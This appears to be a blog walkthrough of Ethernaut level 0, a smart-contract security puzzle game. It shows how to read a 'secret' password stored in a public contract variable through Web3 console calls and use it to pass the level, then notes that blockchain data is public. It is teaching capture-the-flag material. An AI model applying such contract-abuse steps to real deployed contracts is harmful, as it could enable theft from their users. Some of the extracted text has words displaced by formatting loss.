Make a smart contract do things it didn’t want to… This is a around ’s smart contract . I’ll give you the direct resources and key concepts you’ll need to solve the puzzles 100% on your own. in-depth series Zeppelin security puzzles Over the next weeks, we’ll reproduce how some serious hacks were induced, notably: : resulting from a re-entrancy problem $50M DAO hack : induced by a delegatecall() exploitation $30M Parity hack Required : Basic knowledge of smart contract development How Ethernaut works All smart contract source code are compiled into two formats, by the Ethereum Virtual Machine (EVM): : a communication layer between solidity and Javascript, in JSON format Application Binary Interface (ABI) : the low level machine language that gets executed by the the EVM Bytecode When you request for each level, Ethernaut deploys the compiled bytecode to a new address on the Ropsten test network: get a new instance Once this new instance is created on the blockchain, its address is returned to your web client through an event, as seen in the game’s main contract, : Ethernaut.sol https://github.com/OpenZeppelin/ethernaut/blob/master/contracts/Ethernaut.sol Finally, Web3 wraps an ABI around this new contract instance, and allows you to interact with the contract through your web console. Notice that all ` functions are available in the web client public` Detailed Walkthrough This level requires you to guess a secret password in order to “get cleared” to move on. Notice that Ethernaut passed a secret into the constructor, when it created your contract instance: _password function Instance(string _password) public {password = _password;} 2. This password is stored as a variable public string string public password; 3. All public, basic variable types in Solidity have an auto-generated getter function. This means you can directly this not-so-secret password by typing into the console: read await contract.password() You can use async/await to work with Web3 promises with more ease 4. To pass this level, simply call the final function and pass in the retrieved password, via the console: authenticate await contract.authenticate("[password here]"); You’ll be modifying storage in the authenticate function, so expect to pay some gas when calling this transaction. 5. Finally, you should be able to double check if you’ve passed this level: await contract.getCleared(); Key Security Takeaways All functions and variables stored on the blockchain are viewable by the public Never store passwords directly inside a smart contract, (not even as variables, as we’ll learn shortly) private More Levels _This is a in-depth series around Zeppelin team’s smart contract security puzzles. I’ll give you the direct resources…_hackernoon.com Ethernaut Lvl 1 Walkthrough: how to abuse the Fallback function _This is a in-depth series around Zeppelin team’s smart contract security puzzles. I’ll give you the direct resources…_medium.com Ethernaut Lvl 2 Fallout Walkthrough: how simple developer errors become big mistakes

Ethernaut Lvl 0 Walkthrough: ABIs, Web3, and how to abuse them

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

Building A Blockchain in Rust & Substrate: [A Step-by-Step Guide for Developers]

(1/100) Crypto Countdown: Golem

05/03/2018: Biggest Stories in the Cryptosphere

µRaiden: Micropayments for Ethereum

The Noonification: Have U Been Pwned? (1/12/2023)

0x (ZRX) Analysis : Decentralised Exchange Protocol On Ethereum

Building A Blockchain in Rust & Substrate: [A Step-by-Step Guide for Developers]

(1/100) Crypto Countdown: Golem

05/03/2018: Biggest Stories in the Cryptosphere

µRaiden: Micropayments for Ethereum

The Noonification: Have U Been Pwned? (1/12/2023)

0x (ZRX) Analysis : Decentralised Exchange Protocol On Ethereum

Light-Mode

Classic

Newspaper

Minty

Dark-Mode

Neon Noir

Minty

HN StartUps